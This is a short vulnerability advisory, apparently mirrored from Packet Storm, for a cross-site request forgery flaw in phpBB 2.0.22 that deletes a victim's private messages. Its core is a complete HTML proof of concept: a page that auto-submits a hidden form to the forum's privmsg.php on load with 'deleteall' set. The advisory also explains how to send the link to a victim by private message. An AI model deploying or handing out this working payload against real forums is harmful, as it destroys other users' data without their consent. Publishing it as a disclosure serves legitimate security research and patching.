Lucene search
K

phpbb2022-xsrf.txt

🗓️ 25 Jan 2008 00:00:00Reported by NBBNType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

phpBB 2.0.22 Remote PM Delete XSRF Vulnerability, allows attacker to delete victim's PMs via crafted lin

Code
`################################################################  
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability   
by NBBN Type: Cross-Site Request Forgery  
Founded: December 2007   
################################################################  
  
  
An attacker can send a link via pm to a site with the follow html code to a   
victim and all victim's pm's are going to be deleted when he click the link.   
######Code##########################################################  
  
<html>  
<head>  
</head>  
<body onLoad=javascript:document.xsrf.submit()>  
  
<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"   
name="xsrf">  
<input type="hidden" name="mode" value="" />  
<input type="hidden" name="deleteall" value="true" />  
<input type="hidden" name="confirm" value="Yes">  
  
</body>  
</html>  
#####################################################################  
  
  
######Vuln Versions:#####################  
  
I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.   
  
  
  
  
(Sorry my bad english :-) )  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation